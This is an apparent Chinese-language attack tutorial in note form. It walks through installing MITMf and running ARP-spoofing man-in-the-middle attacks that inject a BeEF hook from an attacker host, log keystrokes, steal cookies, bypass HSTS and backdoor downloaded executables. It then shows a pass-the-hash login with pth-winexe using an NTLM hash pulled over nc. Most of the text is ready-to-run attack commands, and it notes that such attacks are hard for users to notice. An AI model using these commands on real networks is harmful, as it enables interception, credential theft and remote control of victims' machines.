1. mitmf
注入xss
即使没有XSS漏洞,也可以凌空向每个HTTP请求中注入XSS攻击代码
如果中间人发生在运营商线路上,很难引起用户注意
曾经号称最好用的中间人攻击工具
安装依赖
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file
安装virtualenvwrapper
pip install virtualenvwrapper
编译virtualenvwrapper.sh
cd /usr/local/bin
ls
source virtualenvwrapper.sh
注意! virtualenvwrapper.sh脚本的位置取决于你的Linux版本,而不是相同的位置,你可以使用命令: find / -name virtualenvwrapper.sh -print 来查找该文件所在具体位置。
创建你的python独立运行环境 virtualenv
mkvirtualenv MITMf -p /usr/bin/python2.7
clone MITMf仓库
git clone https://github.com/byt3bl33d3r/MITMf
进入目录,并且进行初始化
cd MITMf && git submodule init && git submodule update –recursive
安装依赖
pip install -r requirements.txt
注意: 而且由于依赖很多,安装过程会很漫长,不要中途关机或者网络连接断开。
OK!安装完成,查看一下帮助
python mitmf.py –help
注意注意注意!!!,我们创建的python独立运行环境 virtualenv,一定要首先进入这个独立运行环境中,再来运行MITMF,命令为:
source /root/.virtualenvs/MITMf/bin/activate # 进入virtualenv
deactivate # 退出环境
这样,我们就可以正常使用 mitmf 了。
启动beef
cd /usr/share/beef-xss/
./beef
mitmf 中间人注入xss脚本
# 作为中间人连接网页并插入 js
root@kali:~# cd MITMf
root@kali:~/MITMf# python mitmf.py –spoof –arp -i eth0 –gateway 192.168.199.1 –target 192.168.199.116 –inject –js-url http://192.168.199.112:3000/hook.js
浏览的网页已经被注入了xss code了!!!
键盘记录器
# 键盘记录器 –jskeylogger
root@kali:~/MITMf# python mitmf.py –spoof –arp -i eth0 –gateway 192.168.199.1 –target 192.168.199.116 –jskeylogger
其他模块
# 图片翻转:–upsidedownternet
# 屏幕截图:–screen(/var/log/mitmf)
root@kali:~/MITMf# python mitmf.py –spoof –arp -i eth0 –gateway 192.168.199.1 –target 192.168.199.116 –upsidedownternet
# cookie:–ferretng(cookie) 抓取cookie
root@kali:~/MITMf# python mitmf.py –spoof –arp -i eth0 –gateway 192.168.199.1 –target 192.168.199.116 –ferretng
# 浏览器及插件信息: –browserprofiler
# smb:–smbtrap、–smbauth
旁路 –hsts
HTTP Strict Transport Security
防止协议降级、cookie窃取
安全策略通过HTTP响应头 “Strict-Transport-Security“实施
限制 user-agent、https 等
凌空插后门 –filepwn
用户下载的可执行程序在经过代理的时候,会被插入后门
其他欺骗
ICMP
-M icmp:00:11:22:33:44:55/10.0.0.1(真实网关的MAC/IP)
DHCP
−M dhcp:192.168.0.30,35,50−60/255.255.255.0/192.168.0.1(DNS)
Port
-M port /1.1.1.1/ /1.1.1.2/
Ndp
-M ndp //fe80::260d:afff:fe6e:f378/ //2001:db8::2:1/
–
2. Pass the Hash (PTH)
简介
密码破解耗费时间资源巨大
使用密文提交给服务器直接完成身份认证
NTLM/LM是没有加盐的静态HASH密文
企业中使用ghost等工具克隆安装系统
pth-winexe -U w7%aad3b435b51404eeaad3b435b51404ee:ed1bfaeb3063 716ab7fe2a11faf126d8 //1.1.1.1 cmd
获取 win7 HASH 值
使用 kali live iso 登录win7
nc 传输
kali:nc -nvlp 333
win7:nc 192.168.199.116 333
结果:John:1000:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
kali 使用 密文直接登录
root@kali:~# pth-winexe -U John%aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4 //192.168.199.116 cmd